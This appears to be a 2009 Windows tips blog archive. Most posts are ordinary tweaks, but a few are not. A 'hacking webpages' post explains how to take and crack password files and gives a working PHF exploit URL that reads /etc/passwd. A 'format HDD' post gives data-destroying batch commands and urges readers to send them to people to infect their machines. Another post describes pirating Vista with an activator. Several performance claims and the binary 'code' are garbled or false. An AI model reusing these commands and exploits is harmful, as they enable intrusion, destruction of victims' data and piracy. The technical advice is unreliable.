WELCOME GUEST ENJOY YOUR STAY HERE...

TELL A FRIEND ABOUT US.. Share/Save/Bookmark
Showing posts with label Window. Show all posts
Showing posts with label Window. Show all posts

Friday, August 21, 2009

Disabling Unneeded Windows Features

There are likely Windows Features running on the computer you don't need. To see what these may be and make any changes you want:
Start / Control Panel
Programs and Features
Click on Turn Windows features on or off
It typically takes a little while for this window to populate
Hovering the mouse over an entry gives a short description of it
From here you can check or uncheck any entries you want.
For example, you may not need Windows Fax and Scan
Click the OK button when you are done

Thursday, August 13, 2009

Quickly Switching between different operating systems

A program named Restart is a system utility for advanced users with more than one operating system installed on their machine. This program installs an icon in the notification area, and with a single click the computer will shutdown and restart with the selected operating system. The program also includes commands to shutdown the computer in different ways (including stand- by and hibernate), a schedule function, and advanced settings for uncommon configurations.
Please note: this program works in conjunction with the Microsoft boot manager, and it is not compatible with other third-party products.
Freeware. For Windows based operating systems.
Added option for disabling the program from running at startup.

Wednesday, August 12, 2009

Google Search Save Time, Open Results in a New Window

Save time researching Google search engine results by opening web pages in new browser windows.
When you perform a search with Google, your time may be spent doing the following:
1. You perform a search.
2. The results page appears. You try one link that looks good.
3. Once you are done visiting the link, you either use the Back button or re-access Google and re-perform the search.
4. You look at a second result.
5. Once you are done visiting the link, you either use the Back button or re-access Google and re-perform the search.
6. Repeat.
Instead of doing this, there is a way you can keep the Google search results on the screen while using a different browser window to view resultingges. Instead of clicking on a search results link, click on a link with the right-mouse button and choose "Open in New Window" (Macintosh users - hold the OPTION key down while clicking on a link and choose "Open in New Window"). Now, your search results will remain on screen while you research other pages, saving you time!
If your browser supports the feature, you can also open a link in a new Tab. This lets you keep the search results page in one tab and resulting links in another, only using one window onscreen.

Sunday, August 9, 2009

Microsoft Internet Explorer 8 Redisplay Warning When Closing Multiple Tabs

Force Internet Explorer 8 to warn you when closing the browser if multiple tabs are open in case it fails to do so.
By default, Internet Explorer 8 should warn you when you attempt to close the browser and multiple tabs are open. This helps prevent an "oops" if you meant to only close Bing while Twitter, Facebook, CNN, ESPN, and MalekTips are also open, for example.
If you tire of these warnings, the dialog box also contains an area you can check to "Always close all tabs". However, what if you later change your mind or accidentally check this box and didn't mean to? You can configure Internet Explorer 8 to show these warnings again later if desired:
1 . Access the Internet Options dialog box. If the menu bar is visible, you can select "Tools" - "Internet Options". If the Command Bar is visible, click the "Tools" button and select "Internet Options". If neither are available, try typing Alt + T then O.

Accessing Internet Explorer 8 options via the Command Bar

2. When the "Internet Options" dialog box appears, underneath "Tabs", click the "Settings" button.
3. The "Tabbed Browsing Settings" dialog box appears. Check "Warn me when closing multiple tabs".

Configuring Internet Explorer 8 to once again warn you when closing the browser if multiple tabs are opened.

4. Click "OK" on the dialog boxes to store your settings.

Pop A Banner Each Time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Sunday, August 2, 2009

Make shortcut to shut down ur pc directly

First, create a shortcut on your desktop by right- clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double- clicking on it will shut down your PC. But you can do much more with a shutdown shortcut than merely shut down your PC . You can add any combination of several switches to do extra duty, like this: shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one- second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use. I use this technique to create two shutdown shortcuts on my desktop-one for turning off my PC, and one for rebooting. Here are the ones I use: shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "I ll be back m8 ;)!" Switch
What it does -s
Shuts down the PC. -l
Logs off the current user. -t nn
Indicates the duration of delay, in seconds, before performing the action. -c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks. -f
Forces any running applications to shut down. -r
Reboots the PC

HACKING WEBPAGES...

Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...
root:User:d7 Bdg:1 n2 HG2 :1127 :20:Superuser
TomJones:p5 Y(h0 tiC:1229 :20:Tom Jones,:/usr/people/tomjones:/b in/csh
BBob:EUyd5 XAAtv2 dA:1129 :20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.
root:x:0 :1:Superuser:/:
ftp:x:202 :102 :Anonymous ftp:/u1/ftp:
ftpadmin:x:203 :102 :ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:
root:x:0 :1 :0000 - Admin(0000):/:/usr/bin/csh
daemon:x:1 :1 :0000 -Admin(0000):/:
bin:x:2 :2 :0000 - Admin(0000):/usr/bin:
sys:x:3 :3 :0000 -Admin(0000):/:
adm:x:4 :4 :0000 - Admin(0000):/var/adm:
lp:x:71 :8 :0000 - lp(0000):/usr/spool/lp:
smtp:x:0 :0:mail daemon user:/:
uucp:x:5 :5 :0000 - uucp(0000):/usr/lib/uucp:
nuucp:x:9 :9 :0000 - uucp(0000):/var/spool/uucppubl ic:/usr/lib/uucp/uucico
listen:x:37 :4:Network Admin:/usr/net/nls:
nobody:x: 60001 : 60001 :uid no body:/:
noaccess:x: 60002 : 60002 :uid no access:/:
webmastr:x:53 :53:WWW Admin:/export/home/webmastr :/usr/bin/csh
pin4 geo:x:55 :55 :PinPaper Admin:/export/home/webmastr /new/gregY/test/pin4geo:/bin/ false
ftp:x:54 :54:Anonymous FTP:/export/home/anon_ftp:/bi n/false
Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.
Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker there are a few ok ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file... When you start a
cracking prog you will be asked to find the the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net. A dictionary maker finds all the possible letter
combinations with the alphabet that you choose(ASCII, caps, lowercase, and
numeric letters may also be added). We will be releasing our pasword file
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives
you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.
The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:
http://webpage_goes_here/cgi- bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi- bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
The best way to get root is with an exploit. Exploits will be explained soon.,enjoy

Saturday, August 1, 2009

Hunting for missing files?

Computer problem: You must have faced computer problems hundreds of times. Hunting for missing files, especially a.dll that has just task. At a free DLL you can search alphabetically and its tutorials will guide you if you are picking a wrong file. All downloads at www.afreedll.com are free.
Today's most popular DLL files.
Download and restore. DLL files instantly for free without any hassle or problems.

hpzr3207.dll xvidcore.dll
daemon.dll
hpzimc09.dll hpzrp307.dll
hpzcon09.dll
gsdll32.dll hpzr3207.dll
msxml4.dll
SteamUI.dll FileSystem_Steam.dll
Audio3D.dll
yacscom.dll hpzpm309.dll
tier0.dll
HPZc3212.dll hpzcoi09.dll
hpzrp307.dll
vstdlib.dll wmp.dll hpzrm309.dll
UNIRES.DLL ddao35.dll u32Prod.dll
lame_enc.dll atioglxx.dll
hpgwiamd.dll
YbSkin2.dll hpzr3209.dll
IVIEWERS.DLL
MSBIND.DLL Vic32.dll crlds3d.dll
VBA6.DLL DolbyHph.dll MSDBRPTR.DLL
hpzlnt09.dll NPSWF32.dll
capicom.dll
TLBINF32.DLL Steam.dll
hpzsnt09.dll
hpz2 ku09.dll serverbrowser.dll
atiiiexx.dll
isafeif.dll shaderapidx9.dll
Oemdspif.dll
dbg.dll zlcomm.dll LHLogR.dll
hpzflt09.dll Aspen.dll
mfc71.dll
unidrvui.dll u32Comm.dll
hpzimc09.dll
hpzime09.dll Mss32.dll
metada51.dll
hpzjui09.dll ACTEXT.DLL
ativvaxx.dll
mfc71u.dll SHW32.DLL cimwin32.dll
d3drm.dll WING32.DLL hpzres09.dll
kdu_v32R.dll ati2dvag.dll
libapr.dll
UNIRES.DLL aspen.dll ATIDEMGR.dll
CDILLA05.DLL choosusr.dll
hpzslk09.dll
WAVMIX16.DLL hpzcon09.dll
vgui2.dll
hpzrer09.dll hpzvip09.dll
hpztbi09.dll
msvcr71.dll d3 d9.dll gdiplus.dll
comctl32.dll hpzrm309.dll
hpotscl.dll
iuctl.dll npdrmv2.dll msnp32.dll
quartz.dll mspp32.dll ogg.dll
faultrep.dll hpzimc09.dll
winhttp.dll
ywcvwr.dll advrcntr2.dll
px.dll
user32.dll MDT2 FW95.DLL
SHSQL.DLL
unires.dll SAVRT32.DLL
ATIDDC.DLL
nv4_disp.dll libnspr4.dll
gdiplus.dll
libeay32 _0.9.6l.dll pcl5eres.dll
MSRD2 X35.DLL
WKWBL.DLL sccbase.dll hpzimc09.dll
fmod.dll MSENV.DLL fxsapi.dll
hpfud50.dll msstdfmt.dll
hpovst08.dll
yacsui.dll hidserv.dll
WING.DLL
ODBCTOOL.DLL lmmib2.dll
GUTILS.DLL
all r available

TOP ten Tips to increase System Speed

1 .Let your PC boot up completely before opening any applications. 2 .Refresh the desktop after closing any application. This will remove any unused files from the RAM. 3 .Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4 .Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM 5 .Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin. 6 .Delete the temporary internet files regularly. 7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster. 8 .Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application. 10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum. RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!

Increase your RAM and so system speed

1). Start any application, say Word. Open some large documents.
2). Press CTRL+ SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Friday, July 31, 2009

Tricks to make XP FASteR

Boot XP faster:
1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot- *.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file &
click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9 . Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10 . Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.
Increase ur Computers Response time
Indexing services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completley unnessesary.
1.Go to Start
2.Click Settings
3.Click Control Panel
4,Double-click Add/Remove Programs
5,Click the Add/Remove Window Components
6.Uncheck the Indexing services
7.Click Next
That's it, you have now uninstalled the Indexing service, you system will not have more RAM and be more responsive
Correcting System Hang at Startup
If your system hangs about 2 or 3 minutes at startup, where you can't access the Start button or the Taskbar, it may be due to one specific service (Background Intelligent Transfer) running in the background. Microsoft put out a patch for this but it didn't work for me. Here's what you do:
1. Click on Start/Run, type 'msconfig', then click 'OK'.
2. Go to the 'Services' tab, find the 'Background Intelligent Transfer' service, disable it, apply the changes & reboot.
Enhance ur Computers Gaming performance
For Users with 256 MB RAM or more this tweak will boost their Windows- and Game-Performance.
What it does: It tells Windows not to use any Swap File until there is really no more free RAM left.
Open the System Configuration Utility by typing msconfig.exe in the RUN command. There in your System.ini you have to add "ConservativeSwapfileUs age=1 " under the 386enh section.
Restart your Windows and enjoy better Game performance.
[ soon i ll add more tips] roney

Rapidshare Direct downloading Without Waiting..

1. Goto the page you want to download
2. Select FREE button
3 . In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
2. Request a new IP address from your ISP server.
Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.

Tuesday, July 28, 2009

How to Hide Partition

How to Hide the Partitions?
This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!
Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on "Hide these specified drives in My Computer" modify it accordingly then just below you will find another option "Prevent access to drives from My Computer", double click on this option and modify it accordingly.
To make it visible again select "disable" by double clicking on the "Hide these specified drives in My Computer" option.

Branding Windows with your name.

Branding Windows with your Name
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

Monday, July 27, 2009

How to Shutdown PC with timer

Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
********** METHOD # 1 ***************
Right click on your desktop and choose "New=>shortcuts".
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600 " without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So, 60 secs*60 mins=3600secs.
Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse
TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
********* METHOD # 2 **************{EASIER THAN THE PREVIOUS ONE}
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11 :35am. Type this in
start=>Run
Type Code: at 11 :35 shutdown - s
TO ABORT:
Code:shutdown -a

Sunday, July 26, 2009

Hidden Sound track in Windows Xp

Windows XP has a hidden sound track which plays as background music during Windows XP installation process, but most people can't hear this music because they have a sound card that does not have drivers preinstalled on XP.
There are 2 ways by which you can find this hidden sound track:
1.Go to start->search.Search for title.wma.But remember to include hidden files and folders in your search.
2 .Navigate to C:\Windows\system32\oobe\im ages, go to Tools > Folder Options > View, check Show Hidden Files and Folders options and then uncheck Hide Protected Operating System Files. You will now notice a file called title.wma, that is the hidden sound track.
This screenshot will help you out.

XP PROBLEMS AND THEIR FIXES

There is One for Everyone !!
1 ) When i try to access my task manager (Ctr+ Alt+Del)...it displays message
'task manger has been disabled by ur administrator'..., and also i cant access my registry too..!!
what may have caused this problem....
is it becos of some VIRUS...????
how can i repair this without re installing...?? any particular software??
1: Close the IE browser. Log out messenger / Remove Internet Cable.
2: To enable Regedit
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
REG add HKCU\Software\Microsof t\Windows\CurrentVersio n\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
3: To enable task manager : (To kill the process we need to enable task manager)
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
REG add HKCU\Software\Microsof t\Windows\CurrentVersio n\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
4: Now we need to change the default page of IE though regedit.
Start>Run>Regedit
From the below locations in Regedit chage your default home page to google.com or other.
HKEY_CURRENT_USER\SO FTWARE\Microsoft\Internet Explorer\Main
HKEY_ LOCAL_MACHINE\SOFTWAR E\Microsoft\Internet Explorer\Main
HKEY_USERS\Default\Sof tware\Microsoft\Internet Explorer\Main
Just replace the attacker site with google.com or set it to blank page.
5 : Now we need to kill the process from back end. Press Ctrl + Alt + Del
Kill the process svhost32.exe. ( may be more than one process is running.. check properly)
6 : Delete svhost32.exe, svhost.exe files from Windows/ & temp/ directories. Or just search for svhost in your comp.. delete those files.
7: Go to regedit search for svhost and delete all the results you get.
Start menu > Run > Regedit >
8: Restart the computer. That's it now you are virus free.
it works !!
2)I don't have IIS( Internet Information Services) windows componet on my system
As far as I know one can't have IIS running on XP Home. I think u will have to upgrade it to XP Prof.
in proff That's simple get the Win XP CD, go to control panel-->add/remove programs and then to add/remove windows components. There u will find the option for adding IIS, just check the checkbox and follow the instructions. You r done!!
3) Folder Option Vanished
IF U WANT UR FILES THT WERE HIDDEN U CAN TYPE *.* IN SEARCH AND ALSO TICK THE OPTION "INCLUDE HIDDEN FILES".
NOW SEARCH IN THE DRIVE IN WHICH U STORED UR FILES, U WILL GET UR FILES BUT TO GET BACK THE OPTION U EITHER HAVE TO REINSTALL WINDOWS OR REPAIR IT. well this is as far as i know..
Post your Comment If you Know More
4) My volume icon is not showing in taskbar, Yet It's Enable From Control Panel > Sound And devices
Assuming that you have tried the basic steps i am directly trying with the most possible solutions. This issue most commmonly occurs because the settings are not saved. Also there might be some startup program which is diabling the Systray.exe from loading up.
Try this...
1) Re-enable the volume icon by disabling and then enabling Place volume icon in the taskbar in the Sound and Audio applet.
2) Then copy the following text which is in red into a notepad file and then save it as "fix.reg". Please make sure that there is no.txt extension after that.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\So ftware\Microsoft\Window s\CurrentVersion\Policies \Explorer]
"NoSaveSettings"=dword: 00000000
[HKEY_LOCAL_MACHINE\So ftware\Microsoft\Window s\CurrentVersion\Run]
"SystemTray"="SysTray. Exe"
3) Merge the file to the registry by simply double clicking on it.
4) Reboot
This should definitely work. Please reply back with the status.
Cheers
5)Whenever i try d'loading stuff from the net, the download starts and the comp just restarts. due to dis i have to install d'load managers wich i hate. help needed anyone. i have win xp!
If the computer just restarts itself, it cud possibly be an application crash..
check the Dr.watson log for details..
START-RUN- drwtsn32.
check the path for the log here... open the log and check which application is causing the crash.
turn of automatic reboot,cos you wud miss it if there is a BSOD being generated.
or may be u could try this one out
Go to Start>Run--Type 'services.msc', hit ENTER
Scroll down to a service called Remote Procedure Call, right click, go to properties, there will be a tab named Recover Action, change it to 'Take No Action' if it's not already selected. Your problem should be solved for the time being. Also look for all network related srvices DNS, TCP-IP and also Windows Firewall/ICS service if you're on LAN/WAN, see that all of these are set to Automatic or Manual. Reply to me with results
6)I accidentally deleted the Show Desktop icon which sits normally on the bottom left hand corner of the Taskbar. How do I restore the icon?
Click Start, Run and type the following command:
regsvr32 /n /i:U shell32.dll
The Show Desktop icon file should be available now.

HOW TO CLONE A HARD DISK DRIVE..

How to Clone a Hard Drive
Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.
Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.
First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.
Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.
Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.
Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".
Fifth: In this final part, you might want to cut-and- paste to code in, unless you are sure that you can do it without making any mistakes:
Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:
"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.
If you receive an error message, then remove the space from between XCOPY and C:\
Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.
This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.
~cheers~

FORMAT HDD WITH NOTEPAD

Format a HDD with notepad
Step 1.
Copy The Following In Notepad Exactly as it says
010010110001111100100 10101010101010000011 111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz.. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\
011001100110111101110 01001101101011000010 111010000 100000011000110011101 001011100
00100000001011110101 00010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
011001100110111101110 01001101101011000010 111010000 100000011001000011101 001011100
00100000001011110101 00010010111101011000
format a:\ /Q/X -- this will format your drive a:\
011001100110111101110 01001101101011000010 111010000 100000011000010011101 001011100
00100000001011110101 00010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
011001000110010101101 10000100000001011110 100011000 101111010100110010111 101010001
001000000110001100111 01001011100011000100 110111101 101111011101000010111 001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its workin
Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try dis
go to notepad
@Echo off
Del C:\ *.*|y
save it as Dell.bat
worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a.bat file

Saturday, July 25, 2009

VISTA.ALL VERSIONS Activator and make it "Genuine"

download Vista activator FOLLOW INSTALLATION INSTRUCTIONS BELOW!!!!!!!!!!!!!!
************************ ************************ ************************ **********
DISCONNECT YOUR INTERNET
#------------------------------- -------------------------------- ---------#
Install Vista and during the install it will ask for a key {DON"T ENTER A KEY}; continue without key and the you will have option which windows vista would you like to install:
Ultimate
Basic
Premium
I recommend -=Windows Vista Ultimate=-
#------------------------------- -------------------------------- ---------#
Vista Retail All~Crack~ nosorry is the next step.
#--------------------------------------------------- ---------#
Follow Exactly
Just Run The "Vista Activator"
Then put =LegitCheckControl.DLL= in C:\\Windows\System32 this is =Windows Genuine Advantage Validation= tool. Whill make your copy of -=Windows Vista=- (("Genuine")).
Have fun!

Follow Me... Stay Connected

MY STATS

Top Blogs

Learn hacking tips tricks earn online hints cheats

Blog Directory & Search engine

blogarama - the blog directory

BlogsByCategory.com

Technology Blogs - Blog Rankings

Visit blogadda.com to discover Indian blogs

Computers

Computers Blogs